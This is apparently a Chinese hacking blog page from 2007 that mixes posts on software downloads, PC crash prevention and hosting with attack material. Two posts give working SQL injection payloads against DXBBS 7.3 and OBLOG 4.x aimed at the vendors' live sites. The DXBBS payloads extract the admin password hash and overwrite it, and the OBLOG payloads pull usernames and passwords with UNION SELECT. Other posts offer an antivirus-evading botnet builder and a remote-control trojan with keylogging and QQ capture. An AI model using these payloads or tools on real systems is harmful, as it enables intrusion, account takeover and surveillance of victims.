popphen.net.ru
预览模式: 普通 | 列表

傀儡僵尸vip1.4生成器(去后门免杀版)

http://dvd.3800hk.com/UploadFile/2007-4/铁路小峰20074201555280989.gif

朽木修改制作的。。。。。。

虚拟机测试上线了


点击下载

强制点击广告代码

强制点击广告大法(1):如果你的广告点击率太低,这个方法可以强制访客先点击广告

把下面代码copy入你html文件的和中即可:



把下面代码copy入你html文件的和中即可:

先帮忙点击这里

进入





======================================================================
强制点击广告大法(2):点了图象才能看到链接.可用于强制点击广告

第一步:把如下代码加入区域中






第二步:在区中加入如下代码






第三步:把区中内容改为:




======================================================================
强制点击广告大法(3):两个文字链接要先后点击,否则就跳出警告框

第一步:把如下代码加入区域中




第二步:把如下代码加入区域中
先帮忙点击这里

下载本站所有页面

QQ2007 Beta2开始试用&下载地址

尊敬的QQ用户,您幸运地被腾讯公司选中参与QQ2007Beta2试用,我们很高兴有这个机会可以让小部分用户提前试用激动人心的最新版本QQ.在这个试用计划中,我们很希望收集您对QQ2007Beta2的意见,特别是我们已经停用了键盘加密控件的功能,希望能解决部分USB键盘用户的问题.欢迎您到讨论区发表意见,您反映的每个问题都会有专人跟进.让我们一同把属于你我的QQ打造成一款优秀的即时通信软件
体验链接:http://exp.qq.com/cgi-bin/present/tec_cgi_index
下载地址页面:http://exp.qq.com/cgi-bin/present/tec_cgi_plan_detail?plan_id=60&x=7831
绝对地址:http://exp.qq.com/files/60_1177668087.exe

卖空间拉!!!(支持试用,速度+稳定)

本服务器不提供用户控制面板,域名绑定等操作直接在IIS上进行。

虚拟主机系列

空间大小 价格
100M 60 元
200M 100 元
500M 200 元
1GB 300 元
2GB 500 元
5GB 1000 元

服务器配置:
CPU:至强3.0*1
内存:1GECC
主板:INTEL 7520
硬盘:SCSI 146G 高速12000转
电源:500W电源
机箱:标准服务器机箱

操作系统:WINDOWS 2003
语言环境:ASP+ASP.NET+PHP+CGI+ZEND+GD
数 据 库:Access/MYSQL/MSSQL
数据空间:WEB共享
机房位置:浙江金华移动
移动机房:适合电信/网通/铁通/有线通用户访问
流量限制:不限制
数据备份:本地与远程一星期
泛解析目录:支持泛解析
PHP探针:http://www.ccoocc.cn/iProber.php
ASP探针:http://www.ccoocc.cn/aspcheck.asp
软件支持:Discuz!,Bo-blog,Sablog,PhpCMS,Phpwind,Supersite,X-Space,DvBBS 等

购买QQ :87602040

通杀7.3以前所有版本的dxbbs漏洞

漏洞出现在User_Friend.aspx , 由于过滤不严,造成name允许注入, 不多说了,自己看吧。
-------------------------------------------------------------------------------------------
http://www.dxbbs.cn/

这是DXBBS官方网站,版本是7.3,用的access数据库

在User_Friend.aspx过滤了=Add&Name=admin加上''

典型的过滤不严,由于是access,在没有工具的情况下,只能一个一个猜解了

默认管理员是admin, 我们来猜解admin的密码, 工具是老兵的注入浏览器,用的是asc转换猜解法, 我已经下载了一份源代码,可以看一下数据库结构

用户表:DXBBS_user 密码字段:user_pass

http://www.dxbbs.cn/User_F...过滤了=Add&Name=admin'' {v} and ''a''=''a , 因为后面还有一个单引号,没办法注释,所以只能这么构造注入语句,{v}是变量

首先使用语句确定密码长度
and (select top 1 len(user_pass) from DXBBS_user)=16
返回:好友已存在 说明密码的确是16位,经过了MD5加密

接下来猜解密码:
猜解第一位: and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=57 返回:数据不存在,猜测错误,说明密码第一位的ASC值小于57

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=55
正确,说明密码第一位的ASC值大于等于55

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=56
返回错误,说明密码第一位的ASC值大于小于56

既然大于等于55,小于56,那么这个数值就是55,ASC55对应的字符是:7,也就是说,密码第一位是7,

猜测密码第二位就是把
and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=57
改成
and (select top 1 asc(mid(user_pass,2,1)) from dxbbs_user where user_name=''admin'')>=57

后面的以此类推

5分钟后得到管理员密码:74e92e9ececa0ae7

这是MD5加密过的,至于怎么得到明文,不要问我,自己碰运气吧

下面介绍SQL版利用方法:
ser_Friend.aspx过滤了=Add&Name=大蝉;Update [Dxbbs_user] set user_pass=''7a57a5a743894a0e'' where user_name=''admin'';--

网络红娘远控软件2007版(超强功能版)


http://bbs.520hack.com/attachment/Fid_23/23_3780_3c04932b7bdbe47.jpg
反向连接、过防火墙、支持服务器专线上线、支持FTP上线、支持直接IP地址上线;
集成最新IP数据库,可显示被控端所在的地理位置;
具有文件管理功能,可进行上传、下载、压缩、删除、远程执行等操作;
远程注册表编辑功能、强大的进程管理功能、NT服务管理功能;
被控端的屏幕截取以及控制[支持真彩色及黑白色];视频截取、语音监听
Telnet控制、窗口管理、缓存密码截取、在线QQ号码截取[可直接显示性别以及直接QQ对话];
键盘记录、剪切板查看、HTTP代理支持、刷网站流量、以及较详细的计算机配置信息的获取;可自定义上线分组、被控端备注、被控端筛选,以及众多方便的批量管理功能;
当被控端被杀毒软件查杀时,某些情况下还可向控制端发出预警信号[上线栏为红色显示];本远程控制软件采用以服务器专线上线主为、两级备用域名上线为辅的结构,使被控端更加不易丢失;
被控端配置时可自由设置扩充插件的使用情况等、以及更加灵活的安装配置。
下载地址:http://popphen.atedu.net/
解压密码:popphen.net.ru
注:本软件本身乃木马程序,因此被杀软查杀那是很正常的事情
大家如果不放心的话可以去网络红娘的官方下载!

系统死机的原因及预防方法

如今的计算机已经接近全面普及的程度了,它给人们在工作和学习上提供了极大的方便,不过,计算机的“死机”对于普通的计算机用户来说,却成为了一个解不开、挣不脱的烦 恼。每当在计算机开机时、或启动操作系统时、或使用一些应用程序时、或正准备退出操作系统时,“死机”这一头“猛兽”随时都有可能迎面扑来。那么,怎么做才能避免计算机“死机”的烦恼呢?下面,笔者就根据导致“死机”的原因和预防的方法分为几点给大家介绍一下,希望下面的文章能给遇到此类问题的朋友一些帮助。

  一、导致计算机“死机”的原因:

  1.BIOS设置不当所造成的“死机”

  每种硬件有自己默认或特定的工作环境,不能随便超越它的工作权限进行设置,否则就会因为硬件达不到这个要求而死机。例如:一款内存条只能支持到DDR 266,而在BIOS设置中却将其设为DDR 333的规格,这样做就会因为硬件达不到要求而死机,如果就算是能在短时间内正常的工作,电子元件也会随着使用时间的增加而逐渐老化,产生的质量问题也会导致计算机频繁的“死机”。 2.硬件或软件的冲突所造成的“死机”

  计算机硬件冲突的“死机”主要是由中断设置的冲突而造成的,当发生硬件冲突的时候,虽然各个硬件勉强可以在系统中共存,但是不能同时的进行工作,比如能够上网的时候就不能听音乐等等。时间一长,中断的冲突就会频频的出现,最后将导致系统不堪重负,造成“死机”。

同样,软件也存在这种情况。由于不同的软件公司开发的软件越来越多,且这些软件在开发的过程中不可能做到彼此之间的完全熟悉和配合,因此,当一起运行这些软件的时候,很容易就发生大家都同时调用同一个DLL或同一段物理地址,从而发生冲突。此时的计算机系统由于不知道该优先处理哪个请求,造成了系统紊乱而致使计算机“死机”。

  3.硬件的品质和故障所造成的“死机”

  由于目前一些小品牌的计算机硬件产品往往没经过合格的检验程序就投放市场,其中,有很多质量不过关的硬件产品在品质完好计算机硬件的笼罩下是非常隐蔽的,普通人是不容易看出来的。就这些硬件产品来说,造成计算机经常“死机”的原因和它们有着非常直接的关系。另外,还有些硬件的故障是由于使用的年限太久而产生的。一般来说,内存条、CPU和硬盘等部件的寿命在超过三年后就很难保证了,从而也会产生很多隐蔽的“死机”问题。

  4.计算机系统源耗尽所造成的“死机”

  当计算机系统执行了错误的程序或代码时,会使系统的内部形成“死”循环的现象,原本就非常有限的系统资源会被投入到无穷无尽的重复运算当中,当运算到最后会因为计算机过大的使资源耗尽而造成“死机”。还有一点就是,在计算机操作系统中运行了大量的程序,使得系统内存资源不足而造成“死机”。

  5.系统文件遭到破坏所造成的“死机”

  系统文件主要是指在计算机系统启动或运行时起着关键性支持的文件,如果缺少了它们,整个计算机系统将无法正常的运行,当然“死机”也就在所难免了。造成系统文件被破坏的原因有很多,病毒和黑客程序的入侵是最主要的原因。另外,初级用户由于错误操作,删除了系统文件也会造成这种后果。

  6.计算机内部散热不良所造成的“死机”

  由于计算机内部的电子元器件的主要成分是硅(这是一种工作状态受温度影响很大的元素)。在计算机工作时电子元器件的温度就会随之而增高,其表面会发生电子迁移现象,从而改变当前工作状态,造成计算机在工作中突然“死机”。

  7.初级用户的错误操作所造成的“死机”

  对初级用户而言,在使用计算机过程中一些错误的操作也会造成系统的“死机”。比如热插拔硬件、在运行过程中震动计算机、随意删除文件或安装了超过基本硬件设置标准的软件等都可以造成“死机”。

  8.其他方面造成的“死机”

  除了笔者在上面所叙述的原因之外,还有很多千奇百怪的原因可能导致系统的“死机”。比如电压波动过大、光驱读盘能力下降、软盘质量不良、病毒或黑客程序的破坏等等原因。总之,导致计算机死机的原因是多方面的。

  从上面的几点可见,计算机“死机”对一般用户来说并不是什么好事,不过也不是不可避免的,只要用户按照正常的电脑操作,相信“死机”的机率就会减小到最少。下面,笔者就计算机死机的原因所总结的一些经验给大家介绍一下。

二、计算机“死机”的预防:

  1.保证正确的Bios设置。Bios里面的设置一定要合适,错误的Bios设置会使你在运行Windows的时候死机。

  2.经常检查电脑配件接触情况。在板卡接触不良的情况下运行会引起系统死机,因此在更换电脑配件时,一定要使板卡与主机板充分接触。

  3.定期清洁机箱。灰尘太多会使板卡之间接触不良,引起系统在运行中死机,因此机箱要随时清洁,不要让太多的灰尘积存在机箱中。

  4.坚持认真查杀病毒。对来历不明的光盘或软盘,不要轻易使用,对邮件中的附件,要先用杀毒软件检查后再打开。

  5.按正确的操作顺序关机。在应用软件未正常结束运行前,别关闭电源,否则会造成系统文件损坏或丢失,引起在启动或运行中死机。

6.避免多任务同时进行。在执行磁盘整理或用杀毒软件检查硬盘期间,不要运行其他软件,否则会造成死机。

  7.勿过分求新。各种硬件的驱动不一定要随时更新,因为才开发的驱动程序往往里面有bug,会对系统造成损害,引起系统死机,最新的不一定是最好的。

  8.在卸载软件时,用自带的反安装程序或Windows里面的安装/卸载方式,不要直接删除程序文件夹,因为某些文件可能被其他程序共享,一旦删除这些共享文件,会造成应用软件无法使用而死机。

  9.设置硬件设备时,最好检查有无保留中断(IRQ),不要让其他设备使用该中断号,以免引起中断冲突,造成系统死机。

  10.在上网冲浪的时候,不要打开太多的浏览器窗口,否则会导致系统资源不足,引起系统死机。

  11.如果你的机器内存不是很大,千万不要运行占用内存较大的程序,如Photoshop,否则运行时容易死机。

  12.对于系统文件或重要的文件,最好使用隐含属性,这样才不至于因错误操作删除这些文件,引起系统死机。

  13.修改硬盘主引导记录时,最好先保存原来的记录,防止因修改失败而无法恢复原来的引导记录。

  14.CPU、显卡等配件一般不要超频,若确实需要超,要注意超频后板卡的温度,CPU、显卡等长期在非正常频率和温度下工作轻则自动重启或死机,重者烧毁CPU、显卡、主板。

关于申请链接不通过的原因

关于今日以前申请链接不通过的原因是在贵站没有看到本站链接或者贵站在申请时已经加了但是现在我到检查发现已经没有了

希望大家以后申请链接的时候一定要留个言,我才能在第一时间加上 谢谢!! o(∩_∩)o...


【最新漏洞】通杀OBLOG4.0 OBLOG4.5

CODE:
<%

Dim oblog

set oblog=new class_sys

oblog.autoup&#100;ate=False

oblog.start

dim js_blogurl,n

js_blogurl=Trim(oblog.CacheConfig(3))

n=CInt(Request(”n”))

if n=0 then n=1

sel&#101;ct case CInt(Request(”j”))

case 1

call tongji()

case 2

call topuser()

case 3

call adduser()

case 4

call listclass()

case 5

call showusertype()

case 6

call listbestblog()

case 7

call showlogin()

case 8

call showplace()

case 9

call showphoto()

case 10

call showblogstars()

Case 11

Call show_hotblog()

Case 12

Call show_teams()

Case 13

Call show_posts()

Case 14

Call show_hottag()

case 0

call showlog()

end sel&#101;ct

****************省略部分代码******************

Sub show_posts()

Dim teamid,postnum,l,u,t

teamid=Request(”tid”)

postnum=n

l=CInt(Request(”l”))

u=CInt(Request(”u”))

t=CInt(Request(”t”))

Dim rs,sql,sRet,sAddon

Sql=”sel&#101;ct Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Wh&#101;re idepth=0 and isdel=0 ”

If teamid<>“” And teamid<>“0″ Then

teamid=Replace(teamid,”|”,”,”)

Sql=Sql & ” And teamid In (” & teamid & “) ”

End If

Sql=Sql & ” o&#114;der by postid Desc”

Set rs=oblog.Execute(Sql)

sRet=”





Do While Not rs.Eof

sAddon=”\"

* sRet=sRet & “ ” & oblog.Filt_html(Left(rs(2),l)) & “”

If u=1 Then sAddon=rs(4)

if t=1 Then

If sAddon<>“” Then sAddon=sAddon & “,”

sAddon=sAddon & rs(3)

End If

If sAddon<>“” Then sAddon=”(” & sAddon & “)”

sRet=sRet & sAddon & “





rs.Movenext

Loop

Set rs = Nothing

sRet=sRet & “





Response.write oblog.htm2js (sRet,True)

End Sub

调用show_posts()过程必须要符合上面的参数n=1,j=13
(” & teamid & “)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=1 返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=1 and (1=2 返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 查询语句 and (1=1

Sql=”select Top ” & postnum & ” teamid,postid,topic,addtime,author,userid From oblog_teampost Where idepth=0 and isdel=0 ”

http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1) and 1=2 union select 1,2,3,4,5,6 from oblog_admin where id=(1

document.write(’

*

‘);

gid=1跟pid=2里的1,2就是了 直接替换里面的1,2为username,password

Opera 9.20Final优化版

本版本基于Ezibo大哥的"相好"版上修改而在此修改而成的,
其实Ezibo大哥的"相好"版已经是非常完美了
但是有的人不喜欢那么多的右键选项
http://photo7.yupoo.com/20070420/171643_308796627.jpg
删除了一些不常用的右键选项“迅雷、脱兔、Gigaget、orbit等第三方下载选项,使界面更清爽速度更快!
http://photo7.yupoo.com/20070420/171101_1588051768.jpg
加入"查看选中部分的源代码"开启拨号功能,使界面更人性化等 更清爽速度更快!
http://photo7.yupoo.com/20070420/171101_1347587685.jpg
开始菜单默认不显示

下载地址
教育网盘下载:http://popphen.atedu.net/
其他网盘下载:http://tel01.ibmdisk.com/?popphen

使用中如有问题欢迎到我的博客或者Ezibo大哥"相好"版提出
http://my.opera.com/chinese-modify/forums/forum.dml?id=2363
我的博客:http://popphen.net.ru